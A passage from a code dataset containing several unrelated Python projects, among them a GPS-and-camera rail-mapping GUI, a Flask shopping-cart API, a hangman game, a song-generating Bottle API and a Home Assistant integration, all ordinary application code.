self.gps_destination_dir, self.gui)\n \n\n\n self.video_output = True\n # Start the periodic call in the GUI .\n\n self.fps.start()\n self.periodicCall()\n\n\n\n def periodicCall(self):\n \"\"\"\n Check every 1 ms the connection to the GPS system and camera and \n send them to GUI part.\n \"\"\"\n\n if self.gps.running or self.frame is not None or self.frame1 is not None:\n self.check = True\n\n # Update the GUI of the camera and GPS status\n self.gui.processIncoming(self.cameras_state, self.gps.running, self.video_output, self.frame, self.frame1)\n \n\n if not self.running:\n # This is the brutal stop of the system.\n sys.exit(1)\n # # Repeat this function every 1 ms \n # self.f = self.f+1\n # print(self.f)\n self.master.after(1, self.periodicCall)\n\n def checkGpsConnection(self, interval = 1):\n \"\"\"\n Thread to Check the port connection and the status of the GPS System\n every second.\n \"\"\"\n while True:\n # Get the GPS port connection\n verify_gps_connection, 
gps_port = self.gps.get_port()\n if not verify_gps_connection:\n self.gps.running = False\n self.gps.isConnected = False\n elif not self.gps.running:\n self.gps.running = False\n self.gps.open_gps(gps_port,self.gps.baudrate)\n else:\n self.gps.running = True\n self.gps.isConnected = True\n\n time.sleep(interval)\n \n\n\n def checkCameraConnection(self, interval = 1):\n \"\"\"\n Thread to Check the port connection and the status of the Camera\n every second.\n \"\"\"\n while True:\n self.cameras_state = self.find_cam()\n if not self.cameras_state[0]:\n time.sleep(1)\n continue\n if not self.cameras_state[2]:\n time.sleep(1)\n continue\n\n time.sleep(interval)\n\n \n \n def readCameraThread(self, interval=0.05):\n while True:\n if self.cameras_state[0]:\n try:\n self.grabbed ,self.frame = self.camera.read()\n except AttributeError:\n time.sleep(2)\n if self.cameras_state[2]:\n try:\n self.grabbed1 ,self.frame1 = self.camera1.read()\n except AttributeError:\n time.sleep(2)\n # try:\n # self.frame = self.detect(self.frame2, net.eval(), transform)\n # except RuntimeError:\n # print(\"Runtime error\")\n # if self.recordingThread.record_thread is not None and self.recordingThread.isAlive():\n # print(\"putting in cam queue\")\n # self.cam_queue.put(self.frame)\n time.sleep(interval)\n\n self.fps.update()\n\n def readGpsThread(self, interval=1):\n\n while True:\n\n if self.gps.running:\n self.gps.read()\n\n time.sleep(interval)\n # if self.recordingThread.record_thread is not None and self.recordingThread.isAlive():\n # print(\"Putting in gps queue\")\n # self.gps_queue.put(self.gps)\n\n\n def recordData(self):\n \"\"\"\n This function listens to the record button and starts the recording thread accordingly\n \"\"\"\n if self.check:\n if not self.record:\n self.video_output = False\n self.recordingThread.start()\n self.record = True\n self.gui.btn_record.configure(text=\"Recording\", bg=\"red\")\n self.gui.progress_bar.start(int(10000/100)) # duration of videos divided by 100\n else:\n print(\"Alreadiy recording\")\n else:\n print(\"Cannot record, There is no device connected !\")\n\n\n def stopRecord(self):\n \"\"\"\n This function listens to the record button and starts the recording thread accordingly\n \"\"\"\n if self.record:\n self.video_output = True\n self.recordingThread.stop()\n self.record = False\n self.gui.btn_record.configure(text=\"Record Data\", bg=\"green\")\n self.gui.progress_bar.stop()\n else:\n print(\"There is no recording\")\n\n def find_cam(self):\n camera_indexes =[]\n cmd = [\"/usr/bin/v4l2-ctl\", \"--list-devices\"]\n out, err = subprocess.Popen(cmd,stdout=PIPE, stderr=PIPE).communicate()\n out, err = out.strip(), err.strip()\n for l in [i.split(b'\\n\\t') for i in out.split(b'\\n\\n')]:\n if \"See3CAM_CU20\" in l[0].decode(encoding=\"UTF-8\"):\n camera_indexes.append(int(l[1].decode(encoding=\"UTF-8\")[-1]))\n\n\n\n if camera_indexes.__len__() == 2:\n return (True, camera_indexes[0], True, camera_indexes[1])\n elif camera_indexes.__len__() == 1:\n return (True, camera_indexes[0], False, None)\n else:\n return (False, None, False, None)\n \n def detect(self, frame, net, transform): # We define a detect function that will take as inputs, a frame, a ssd neural network, and a transformation to be applied on the images, and that will return the frame with the detector rectangle.\n\n height, width = frame.shape[:2] # We get the height and the width of the frame.\n frame_t = transform(frame)[0] # We apply the transformation to our frame.\n x = 
torch.from_numpy(frame_t).permute(2, 0, 1) # We convert the frame into a torch tensor.\n x = Variable(x.unsqueeze(0)) # We add a fake dimension corresponding to the batch.\n x = x.cuda()\n y = net(x) # We feed the neural network ssd with the image and we get the output y.\n detections = y.data # We create the detections tensor contained in the output y.\n scale = torch.Tensor([width, height, width, height]) # We create a tensor object of dimensions [width, height, width, height].\n for i in range(detections.size(1)): # For every class:\n if (labelmap[i-1] == \"car\") or (labelmap[i-1] == \"person\") or (labelmap[i-1] == \"motorbike\") or (labelmap[i-1] == \"bicycle\") or (labelmap[i-1] == \"bus\"):\n j = 0 # We initialize the loop variable j that will correspond to the occurrences of the class.\n while detections[0, i, j, 0] >= 0.6: # We take into account all the occurrences j of the class i that have a matching score larger than 0.6.\n # We get the coordinates of the points at the upper left and the lower right of the detector rectangle.\n pt = (detections[0, i, j, 1:] * scale).cpu().numpy()\n topLeft = (int(pt[0]), int(pt[1])) # We get the top Left corner of the ogject detected\n bottomRight = (int(pt[2]), int(pt[3])) # We get the bottom Right corner of the object detected\n x, y = topLeft[0] , topLeft[1] # We get the coordinates of the top Left Corner\n x = max(x,0)\n y = max(y,0)\n w, h = bottomRight[0] - topLeft[0], bottomRight[1] - topLeft[1] # We get the width and the height of the object detected\n #print(\"x = \", x, \" y = \", y, \"w = \", w , \" h = \" ,h)\n cv2.rectangle(frame, topLeft, bottomRight, (0, 0, 0), cv2.FILLED) # We draw a rectangle around the detected object.\n cv2.putText(frame, labelmap[i - 1], topLeft, cv2.FONT_HERSHEY_SIMPLEX, 2, (255, 255, 255), 2, cv2.LINE_AA) # We put the label of the class right above the rectangle.\n j += 1 # We increment j to get to the next occurrence.\n return frame # We return the original frame with the detector rectangle and the label around the detected object.\n\n \n\nrand = random.Random()\nroot = tkinter.Tk()\nclient = ThreadedClient(root)\n\ndef close_application_globally():\n \"\"\"\n This function close the different threads of the application when\n the user exits the App. \n \"\"\"\n client.fps.stop()\n try:\n client.camera.stop()\n client.camera1.stop()\n except AttributeError:\n print(\"There is no camera\")\n print(\"[INFO] elapsed time: {:.2f}\".format(client.fps.elapsed()))\n print(\"[INFO] approx. FPS: {:.2f}\".format(client.fps.fps()))\n print(\"Closing Threads and dependencies\")\n client.running = 0\n client.gps.stop()\n \n root.destroy()\n sys.exit(1)\n\nroot.protocol(\"WM_DELETE_WINDOW\", close_application_globally)\nroot.mainloop()","repo_name":"omarsomey/Digits4RailMaps","sub_path":"d4rm_tool_old.py","file_name":"d4rm_tool_old.py","file_ext":"py","file_size_in_byte":13490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73888567235","text":"from . 
import config_dt\nimport numpy\nfrom sklearn.tree import DecisionTreeClassifier\nfrom matplotlib import pyplot as plt\nfrom sklearn import tree\n\nlocal_config = config_dt.Config()\nlocal_config.build_data()\n\nclass Decision_Tree:\n def __init__(self, preprocessed_data, labels, feature_columns):\n self.labels = labels\n self.data = preprocessed_data\n self.feature_columns = feature_columns\n \n def train(self):\n self.decision_tree = DecisionTreeClassifier()\n self.decision_tree.fit(self.data, self.labels)\n\n def visualize(self):\n fig = plt.figure(figsize=(25,20))\n _ = tree.plot_tree(self.decision_tree, \n feature_names=self.feature_columns, \n class_names=local_config.class_names,\n filled=True)\n fig.savefig(\"tree.png\")\n\n def evaluate(self):\n pass\n\n def predict(self, data_to_predict):\n return self.decision_tree.predict(data_to_predict)\n","repo_name":"Yassellee/ContextTree","sub_path":"decision_tree/tree_builder.py","file_name":"tree_builder.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34732587571","text":"def fibonacci(n):\r\n if n == 0:\r\n return 0\r\n if n == 1:\r\n return 1\r\n if n < 0:\r\n print('Enter non negative integer')\r\n else:\r\n return fibonacci(n-1) + fibonacci(n-2)\r\n\r\n\r\ndef main():\r\n n1 = int(input(\"Enter the starting number: \"))\r\n n2 = int(input(\"Enter the ending number: \"))\r\n for i in range(n1, n2+1):\r\n print(fibonacci(i), end=' ')\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n\r\n","repo_name":"raksh8/MapleLabs-Python-Training","sub_path":"Fibonacci.py","file_name":"Fibonacci.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3620001838","text":"import json\nfrom decimal import Decimal\n\nfrom flask import (\n Blueprint,\n request,\n session\n)\nfrom flask_babel import gettext as _\n\nfrom app.database import db\n\nfrom app.helpers import (\n model_create,\n model_update,\n model_delete,\n log_info,\n toint\n)\nfrom app.helpers.date_time import current_timestamp\nfrom app.helpers.user import (\n check_login,\n get_uid\n)\n\nfrom app.services.response import ResponseJson\nfrom app.services.api.cart import (\n CartService,\n CheckoutService,\n CartStaticMethodsService\n)\n\nfrom app.models.order import (\n Order,\n OrderGoods\n)\nfrom app.models.item import Goods\nfrom app.models.cart import Cart\n\n\ncart = Blueprint('api.cart', __name__)\n\nresjson = ResponseJson()\nresjson.module_code = 12\n\n\n@cart.route('/')\ndef index():\n \"\"\"购物车\"\"\"\n resjson.action_code = 10\n\n uid = get_uid()\n session_id = session.sid\n is_login = 1 if uid else 0\n\n cs = CartService(uid, session_id)\n cs.check()\n log_info(cs)\n data = {\n 'is_login': is_login,\n 'carts': cs.carts,\n 'cart_total': cs.cart_total,\n 'cart_amount': cs.cart_amount,\n 'items_amount': cs.items_amount,\n 'items_quantity': cs.items_quantity}\n return resjson.print_json(0, u'ok', data)\n\n\n@cart.route('/add')\ndef add():\n \"\"\"加入购物车\"\"\"\n resjson.action_code = 11\n\n uid = get_uid()\n session_id = session.sid\n\n args = request.args\n order_id = toint(args.get('order_id', '0'))\n goods_id = toint(args.get('goods_id', '0'))\n quantity = toint(args.get('quantity', '1'))\n current_time = current_timestamp()\n items_data = []\n\n if order_id > 0:\n order = Order.query.filter(Order.order_id == order_id).filter(\n Order.uid == uid).first()\n if not order:\n return 
resjson.print_json(resjson.PARAM_ERROR)\n\n order_goods = OrderGoods.query.filter(\n OrderGoods.order_id == order_id).all()\n for _order_goods in order_goods:\n items_data.append(\n {'goods_id': _order_goods.goods_id,\n 'quantity': _order_goods.goods_quantity})\n else:\n # 检查\n if goods_id <= 0 or quantity < 1:\n return resjson.print_json(resjson.PARAM_ERROR)\n\n items_data.append({'goods_id': goods_id, 'quantity': quantity})\n\n for item_data in items_data:\n goods_id = item_data.get('goods_id')\n quantity = item_data.get('quantity')\n\n # 检查\n item = Goods.query.get(goods_id)\n if not item:\n return resjson.print_json(10, _(u'找不到商品'))\n\n # 获取购物车商品\n q = Cart.query.filter(Cart.goods_id == goods_id).filter(\n Cart.checkout_type == 1)\n if uid:\n q = q.filter(Cart.uid == uid)\n else:\n q = q.filter(Cart.session_id == session_id)\n cart = q.first()\n\n # 计算商品购买数量\n quantity += cart.quantity if cart else 0\n\n if order_id <= 0 and quantity > item.stock_quantity:\n return resjson.print_json(11, u'库存不足')\n\n # 是否创建购物车商品\n if not cart:\n data = {\n 'uid': uid,\n 'session_id': session_id,\n 'goods_id': goods_id,\n 'quantity': 0,\n 'is_checked': 1,\n 'checkout_type': 1,\n 'add_time': current_time}\n cart = model_create(Cart, data)\n # 更新购物车商品\n\n data = {'quantity': quantity, 'update_time': current_time}\n cart = model_update(cart, data)\n\n db.session.commit()\n\n cs = CartService(uid, session_id)\n cs.check()\n session['cart_total'] = cs.cart_total\n\n return resjson.print_json(\n 0,\n u'ok',\n {'cart_total': cs.cart_total, 'cart_num': quantity})\n\n\n@cart.route('/update')\ndef update():\n \"\"\"更新购物车\"\"\"\n resjson.action_code = 12\n\n uid = get_uid()\n session_id = session.sid\n\n args = request.args\n cart_id = toint(args.get('cart_id', 0))\n quantity = toint(args.get('quantity', 0))\n current_time = current_timestamp()\n\n # 检查\n if cart_id <= 0 or quantity <= 0:\n return resjson.print_json(resjson.PARAM_ERROR)\n\n # 获取购物车商品\n q = Cart.query.filter(Cart.cart_id == cart_id).filter(\n Cart.checkout_type == 1)\n if uid:\n q = q.filter(Cart.uid == uid)\n else:\n q = q.filter(Cart.session_id == session_id)\n cart = q.first()\n if cart is None:\n return resjson.print_json(10, _(u'购物车里找不到商品'))\n\n # 更新购物车商品\n data = {'quantity': quantity, 'update_time': current_time}\n model_update(cart, data, commit=True)\n\n cs = CartService(uid, session_id)\n cs.check()\n session['cart_total'] = cs.cart_total\n\n for _cart in cs.carts:\n if _cart['cart'].cart_id == cart_id:\n _items_amount = _cart['items_amount']\n\n # 商品状态\n item = Goods.query.get(cart.goods_id)\n is_valid, valid_status = CartStaticMethodsService.check_item_statue(\n item, cart)\n\n data = {'cart_total': cs.cart_total, 'items_quantity': cs.items_quantity,\n 'items_amount': cs.items_amount, '_items_amount': _items_amount,\n 'is_valid': is_valid, 'valid_status': valid_status}\n return resjson.print_json(0, u'ok', data)\n\n\n@cart.route('/remove')\ndef remove():\n \"\"\"删除购物车商品\"\"\"\n resjson.action_code = 13\n\n uid = get_uid()\n session_id = session.sid\n\n carts_id = request.args.get('carts_id', '').strip()\n carts_id = carts_id.split(',')\n\n # 检查\n if len(carts_id) == 0:\n return resjson.print_json(10, _(u'请选择需要删除的商品'))\n\n for cart_id in carts_id:\n # 获取购物车商品\n q = Cart.query.filter(Cart.cart_id == cart_id).filter(\n Cart.checkout_type == 1)\n if uid:\n q = q.filter(Cart.uid == uid)\n else:\n q = q.filter(Cart.session_id == session_id)\n cart = q.first()\n if cart is None:\n return resjson.print_json(11, _(u'购物车里找不到商品'))\n\n # 删除购物车商品\n 
model_delete(cart)\n\n db.session.commit()\n\n cs = CartService(uid, session_id)\n cs.check()\n session['cart_total'] = cs.cart_total\n\n data = {'cart_total': cs.cart_total, 'items_quantity': cs.items_quantity,\n 'items_amount': cs.items_amount}\n return resjson.print_json(0, u'ok', data)\n\n\n@cart.route('/checked')\ndef checked():\n \"\"\"选中\"\"\"\n resjson.action_code = 14\n\n uid = get_uid()\n session_id = session.sid\n\n carts = request.args.get('carts', '[]').strip()\n current_time = current_timestamp()\n\n try:\n carts = json.loads(carts)\n except Exception as e:\n return resjson.print_json(resjson.PARAM_ERROR)\n for cart in carts:\n cart_id = toint(cart.get('cart_id', 0))\n is_checked = toint(cart.get('is_checked', -1))\n\n # 检查\n if cart_id <= 0 or is_checked not in [0, 1]:\n return resjson.print_json(resjson.PARAM_ERROR)\n\n # 获取购物车商品\n q = Cart.query.filter(Cart.cart_id == cart_id).filter(\n Cart.checkout_type == 1)\n if uid:\n q = q.filter(Cart.uid == uid)\n else:\n q = q.filter(Cart.session_id == session_id)\n cart = q.first()\n if cart is None:\n return resjson.print_json(10, _(u'购物车里找不到商品'))\n\n # 更新购物车商品\n data = {'is_checked': is_checked, 'update_time': current_time}\n model_update(cart, data)\n\n db.session.commit()\n\n cs = CartService(uid, session_id)\n cs.check()\n\n data = {'cart_total': cs.cart_total, 'items_quantity': cs.items_quantity,\n 'items_amount': cs.items_amount}\n return resjson.print_json(0, u'ok', data)\n\n\n@cart.route('/checkout/amounts')\ndef checkout_amounts():\n \"\"\"结算金额\"\"\"\n resjson.action_code = 15\n\n if not check_login():\n return resjson.print_json(resjson.NOT_LOGIN)\n uid = get_uid()\n\n args = request.args\n carts_id = args.get('carts_id', '[]').strip()\n shipping_id = toint(args.get('shipping_id', '0'))\n coupon_id = toint(args.get('coupon_id', '0'))\n\n try:\n carts_id = json.loads(carts_id)\n carts_id = [toint(cart_id) for cart_id in carts_id]\n except Exception as e:\n return resjson.print_json(resjson.PARAM_ERROR)\n\n cs = CheckoutService(uid, carts_id, shipping_id, coupon_id)\n if not cs.check():\n return resjson.print_json(11, cs.msg)\n\n data = {'items_amount': cs.items_amount,\n 'shipping_amount': cs.shipping_amount,\n 'discount_amount': cs.discount_amount,\n 'pay_amount': cs.pay_amount}\n return resjson.print_json(0, u'ok', data)\n\n\n@cart.route('/checkout')\ndef checkout():\n \"\"\"确认订单\"\"\"\n\n resjson.action_code = 16\n\n if not check_login():\n return resjson.print_json(resjson.NOT_LOGIN)\n uid = get_uid()\n\n args = request.args\n order_id = toint(args.get('order_id', 0))\n # 已有订单,获取订单数据\n if order_id > 0:\n data = CartStaticMethodsService.pay_page(order_id, uid, 'api')\n if not data[0]:\n return resjson.print_json(11, data[1])\n\n return resjson.print_json(0, u'ok', data[2])\n\n buy_now = toint(args.get('buy_now', 0))\n goods_id = toint(args.get('goods_id', 0))\n carts_id = args.get('carts_id', '')\n\n if buy_now not in [0, 1]:\n return resjson.print_json(resjson.PARAM_ERROR)\n # 立即购买\n if buy_now == 1 and goods_id <= 0:\n return resjson.print_json(resjson.PARAM_ERROR)\n # 购物车购买\n if buy_now == 0 and carts_id == '':\n return resjson.print_json(resjson.PARAM_ERROR)\n\n # 结算页面\n data = CartStaticMethodsService.checkout_page(uid, 'api')\n if not data[0]:\n return resjson.print_json(12, data[1])\n\n return resjson.print_json(0, u'ok', 
data[2])\n","repo_name":"kapokcloud-inc/theonestore","sub_path":"app/views/api/cart.py","file_name":"cart.py","file_ext":"py","file_size_in_byte":10013,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"61"} +{"seq_id":"70089457474","text":"#Thomas Thorpe\r\n#Pet Service System PopulateXCombo\r\n\r\nfrom PetServiceDatabase import *\r\n\r\ndef PopulateVetCombo(came_from):\r\n sql = \"\"\"SELECT VetFirstName, VetLastName FROM Vet\"\"\"\r\n data = database.FetchAllResult(sql)\r\n\r\n vet_list = [\"Add New Vet\"]\r\n for count in range(len(data)):\r\n vet_list.append(\"{0} {1}\".format(data[count][0], data[count][1]))\r\n came_from.vet_combo.addItems(vet_list)\r\n\r\ndef PopulateEmergencyCombo(came_from):\r\n sql = \"\"\"SELECT EmFirstName, EmLastName FROM Emergency\"\"\"\r\n data = database.FetchAllResult(sql)\r\n\r\n emergency_list = [\"Add New Emergency Contact\"]\r\n for count in range(len(data)):\r\n emergency_list.append(\"{0} {1}\".format(data[count][0], data[count][1]))\r\n came_from.emergency_combo.addItems(emergency_list)\r\n\r\ndef PopulateCustomerCombo(came_from):\r\n sql = \"\"\"SELECT FirstName, LastName FROM Customer\"\"\"\r\n data = database.FetchAllResult(sql)\r\n\r\n customer_list = [\"Add New Customer\"]\r\n if len(data) != 0:\r\n for count in range(len(data)):\r\n customer_list.append(\"{0} {1}\".format(data[count][0], data[count][1]))\r\n came_from.customer_combo.addItems(customer_list)\r\n came_from.customer_combo.setCurrentIndex(1) #set default to first customer not \"add new x\"\r\n else:\r\n came_from.customer_combo.addItems(customer_list)\r\n came_from.customer_combo.setCurrentIndex(0)","repo_name":"ThomasThorpe/PetMindingBusiness","sub_path":"Program/PopulateXCombo.py","file_name":"PopulateXCombo.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37345190889","text":"import pygame\r\nfrom pygame import mixer\r\nimport random\r\n\r\ndef gettext(x, y, label, numeric, size, spaces,leng):\r\n word = [] # hold word or number to return\r\n length = 0 # gets length of entered word - will not allow more than the size\r\n prompt = font.render(label, True, black) #render the prompt\r\n pygame.draw.rect(screen,white,(x-300,y,800,50)) # draw a white recangle over previous x an y cordinates\r\n screen.blit(prompt, (x, y)) # display the new x and y coordinates\r\n\r\n pygame.display.update() # update display\r\n while True: # main loop to enter data\r\n\r\n for event in pygame.event.get(): # user entered something\r\n\r\n if event.type == pygame.QUIT: # user decided to end program (click X at top right)\r\n pygame.quit()\r\n quit()\r\n\r\n if event.type == pygame.KEYDOWN: # user touch a key\r\n if event.key == pygame.K_SPACE and spaces==True: # if space then force space and append to the workd\r\n word.append(\" \") # if they press space add a blank space to the word\r\n if event.key == pygame.K_RETURN: # if Return then user is finished entery data\r\n\r\n newword = \"\" # holds word to return from function\r\n\r\n for char in word: # loop to remove any spaces\r\n if (spaces == False):\r\n if char != \"space\":\r\n newword = newword + char #if spaces are not allowed only add the letters to the list that are not space\r\n return newword #return the word\r\n break\r\n if event.key == pygame.K_DELETE or event.key == pygame.K_BACKSPACE:\r\n del word[-1:] #remove the last letter of the word\r\n newword = \"\" \r\n for char in word:\r\n 
newword = newword + char #redo the word without the last letter\r\n length=length-1 #remove one from the length of the word\r\n \r\n pygame.draw.rect(screen, white, (x+leng, y, 200, 50)) #draw a white rectangle over the removed letter\r\n afterdelete = font.render(newword, True, black) #render the new word without the last letter\r\n \r\n screen.blit(afterdelete, (x+leng, y)) # display the new x and y coordinates\r\n pygame.display.update() # update display\r\n else:\r\n key = pygame.key.name(event.key)\r\n if len(key) == 1 and length < size: #if the length maximum has not been exeeded \r\n ascii = ord(key)\r\n if (numeric == True): # only allow number input\r\n if ascii > 47 and ascii < 59: # number input\r\n word.append(key)\r\n length = length + 1\r\n else:\r\n word.append(key) #add the letter to the word\r\n length = length + 1\r\n newword=\"\" \r\n for char in word:\r\n newword = newword + char #redo new word by clearing it then adding the letters back\r\n output = font.render(newword, True, black) #renders the word\r\n prompt = font.render(label, True, black) #renders the prompt\r\n\r\n pygame.draw.rect(screen, white, (x, y, 200, 50)) #draws over the old content to make room for the new\r\n screen.blit(prompt, (x, y)) # display the new x and y coordinates\r\n screen.blit(output, (x + leng, y)) # display the new x and y coordinates\r\n pygame.display.update() # update display\r\n\r\npygame.init()\r\n\r\nname=pygame.display.set_caption(\"Hangman\") #changes the name of the program to Hangman\r\n\r\nhangmen=[] #the list to hold the diferent hangmen\r\n\r\nhangmen.append(pygame.image.load(\"hangman 1.png\"))\r\nhangmen.append(pygame.image.load(\"hangman 2.png\"))\r\nhangmen.append(pygame.image.load(\"hangman 3.png\"))\r\nhangmen.append(pygame.image.load(\"hangman 4.png\"))\r\nhangmen.append(pygame.image.load(\"hangman 5.png\"))\r\nhangmen.append(pygame.image.load(\"hangman 6.png\"))\r\nhangmen.append(pygame.image.load(\"hangman 7.png\"))\r\nhangmen.append(pygame.image.load(\"hangman 8.png\"))\r\n\r\n#loads in all the images of hangman\r\n\r\nscreen=pygame.display.set_mode((850,800)) #sets the screen size\r\n\r\nblack=(0,0,0)\r\nwhite=(255,255,255)\r\n\r\nscreen.fill(white)\r\npygame.display.update()\r\n\r\nfont=pygame.font.SysFont(\"comicsansms\",24)\r\nplayers=gettext(100,100,\"# of players :\",True,1,False,200) #get the number of players one or 2\r\n\r\nscreen.fill(white)\r\npygame.display.update()\r\n\r\nif players==\"1\":\r\n words=[]\r\n file=open('words.txt','r')\r\n for word in file:\r\n words.append(word)\r\n file.close()\r\n #get the words from the file\r\n r=random.randint(0,853)\r\n word=words[r]\r\n word=word.lower()\r\n word=word.strip()\r\n #choose a word then strip it and put it in lower case\r\n\r\nif players==\"2\":\r\n label=font.render(\"Enter the word for your opponent to\",True,black)\r\n screen.blit(label,(100,100))\r\n pygame.display.update()\r\n word=gettext(100,150,\"guess (max 7)and click enter :\",False,8,False,350)\r\n word=word.lower()\r\n \r\n\r\n\r\nscreen.fill(white)\r\npygame.display.update()\r\n\r\nanswered=False #the player hasent yet entered an answer\r\nhangmantype=1 #the first hangman picture\r\n\r\n#location of underline x position\r\nlocx=100\r\n\r\nfor x in range(0,len(word)):\r\n label=font.render(\"_\",True,black)\r\n screen.blit(label,(locx,600))\r\n pygame.display.update()\r\n locx=locx+100\r\n #draw the blank spaces in under the letters\r\n\r\nlocx=100 #the first blank letter\r\nguessed=-125 #how many letters or words have been 
guessed\r\nletssolved=0 #the number of letters that have been solved\r\nhangmantype=0 #the type of hangman displayed\r\nloose=False #they havent lost the game\r\nwhile loose==False:\r\n screen.blit(hangmen[hangmantype],(400,200))\r\n pygame.display.update()\r\n guess=gettext(100,150,\"guess a letter or the full word :\",False,8,False,350)\r\n letplace=0 #the location of the letter in the word\r\n isletterthere=False #to make you gain a hangman level if the letter you chose is not there\r\n if len(guess)==1:\r\n for let in word:\r\n if let==guess:\r\n label=font.render(let,True,black)\r\n screen.blit(label,(locx+letplace,600))\r\n letssolved+=1\r\n isletterthere=True\r\n letplace+=100\r\n if isletterthere==False:\r\n hangmantype+=1\r\n guessed+=125\r\n label=font.render(guess,True,black)\r\n screen.blit(label,(guessed,100))\r\n pygame.display.update()\r\n \r\n else:\r\n guessed+=125\r\n if guess==word:\r\n label=font.render(\"you got it!\",True,black)\r\n screen.blit(label,(100,50))\r\n else:\r\n label=font.render(guess,True,black)\r\n screen.blit(label,(guessed,100))\r\n hangmantype+=1\r\n if letssolved==len(word):\r\n label=font.render(\"you got it!\",True,black)\r\n screen.blit(label,(100,50))\r\n pygame.display.update()\r\n break\r\n screen.blit(hangmen[hangmantype],(400,200))\r\n pygame.display.update()\r\n if hangmantype>6:\r\n label=font.render(\"you lose word was :\"+word,True,black)\r\n screen.blit(label,(100,50))\r\n pygame.display.update()\r\n loose=True\r\n break\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n","repo_name":"nicholves/Hangman","sub_path":"Hangman (1).py","file_name":"Hangman (1).py","file_ext":"py","file_size_in_byte":7612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11107684027","text":"import os\nfrom LanguageGenerationLSTM import LanguageGenerationLSTM\nfrom bottle import Bottle, run, response\nimport bottle\n\nrockModel = LanguageGenerationLSTM(\"./pickles/hackathon-model-rock\", \"./data/Rock\")\nprint(\"----- ROCK MODEL LOADED -----\")\npopModel = LanguageGenerationLSTM(\"./pickles/hackathon-model-pop\", \"./data/Pop\")\nprint(\"----- POP MODEL LOADED -----\")\ncountryModel = LanguageGenerationLSTM(\"./pickles/hackathon-model-country\", \"./data/Country\")\nprint(\"----- COUNTRY MODEL LOADED -----\")\nmetalModel = LanguageGenerationLSTM(\"./pickles/hackathon-model-metal\", \"./data/Metal\")\nprint(\"----- METAL MODEL LOADED -----\")\n\napp = Bottle()\n\n@app.route('/rock')\ndef getRockSong():\n song = rockModel.createSong()\n return {\"song\": song, \"genre\": \"Rock\"}\n\n@app.route('/metal')\ndef getMetalSong():\n song = metalModel.createSong()\n return {\"song\": song, \"genre\": \"Metal\"}\n\n@app.route('/country')\ndef getCountrySong():\n song = countryModel.createSong()\n return {\"song\": song, \"genre\": \"Country\"}\n\n@app.route('/pop')\ndef getPopSong():\n song = popModel.createSong()\n return {\"song\": song, \"genre\": \"Pop\"}\n\n\nclass EnableCors(object):\n name = 'enable_cors'\n api = 2\n\n def apply(self, fn, context):\n def _enable_cors(*args, **kwargs):\n # set CORS headers\n response.headers['Access-Control-Allow-Origin'] = '*'\n response.headers['Access-Control-Allow-Methods'] = 'GET, POST, PUT, OPTIONS'\n response.headers['Access-Control-Allow-Headers'] = 'Origin, Accept, Content-Type, X-Requested-With, X-CSRF-Token'\n\n if bottle.request.method != 'OPTIONS':\n # actual request; reply with the actual response\n return fn(*args, **kwargs)\n\n return _enable_cors\n\n\nif __name__ == 
'__main__':\n port = int(os.environ.get('PORT', 5000))\n print(\"----- STARTING SERVER ON PORT 5000 -----\")\n app.install(EnableCors())\n app.run(host='0.0.0.0', port=port, debug=True)\n","repo_name":"dylanedwards-pubnub/hackathon-march-2022","sub_path":"music-generator-api/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14805481897","text":"from homeassistant import config_entries\nimport voluptuous as vol\n\nfrom .const import \\\n DOMAIN, \\\n CONF_ENABLE_LIGHT, CONF_FAN_HOST, CONF_FAN_NAME\n\n\ndef get_schema(user_input=None):\n data = {}\n if user_input is not None:\n data = user_input\n\n def default(key, default_value=None):\n kwargs = {}\n\n if bool(data.get(key)):\n kwargs['default'] = data[key]\n elif default_value:\n kwargs['default'] = default_value\n\n return kwargs\n\n return vol.Schema({\n vol.Required(CONF_FAN_HOST, **default(CONF_FAN_HOST)): str,\n vol.Required(CONF_FAN_NAME, **default(CONF_FAN_NAME)): str,\n vol.Required(CONF_ENABLE_LIGHT, **default(CONF_ENABLE_LIGHT, True)): bool\n })\n\nclass ModernFormsConfigFlow(config_entries.ConfigFlow, domain=DOMAIN):\n VERSION = 1\n\n async def async_step_user(self, user_input=None):\n errors = {}\n\n if user_input is not None:\n if len(errors) == 0:\n await self.async_set_unique_id(\n user_input[CONF_FAN_HOST], raise_on_progress=False\n )\n\n return self.async_create_entry(\n title=user_input[CONF_FAN_NAME],\n data=user_input,\n )\n\n return self.async_show_form(\n step_id=\"user\", data_schema=get_schema(user_input), errors=errors)\n","repo_name":"jimpastos/ha-modernforms","sub_path":"custom_components/modernforms/config_flow.py","file_name":"config_flow.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"61"} +{"seq_id":"23427270831","text":"import os, sys, re\n\n\n#2 cookies per second\n#C cookies = cost of cookie farm\n#extra F cookies per second per farm\n#X unspent cookies = victory\n#C F X\n#Format: \\d+\\.\\d+\n\n#recursive function f(s, c, f, x, n)\n# s is current seconds\n# c is farm cost\n# f is addtl cookies/farm\n# x is cookies to earn\n# n is farms owned\n# check seconds for victory\n# check seconds for farm purchase\n# call self with additional farm\n# return lowest seconds\n# does increased rate offset C extra seconds\n# if I keep my C cookies, can I get to X quicker?\n\ndef compare_times(s, c, f, x, n):\n solved = False\n while not solved:\n wait = s + (x / (2 + f * n)) # assume this is slower\n buy = s + (c / (2 + f * n)) + (x / (2 + f * (n + 1)))\n if wait < buy:\n return wait\n else:\n s = s + (c / (2 + f * n))\n n = n + 1\n\ndef magic(cases, data):\n ans = []\n for i in xrange(cases):\n ans.append(compare_times(0.0, data[i][0], data[i][1], data[i][2], 0))\n return ans\n\n\nif __name__ 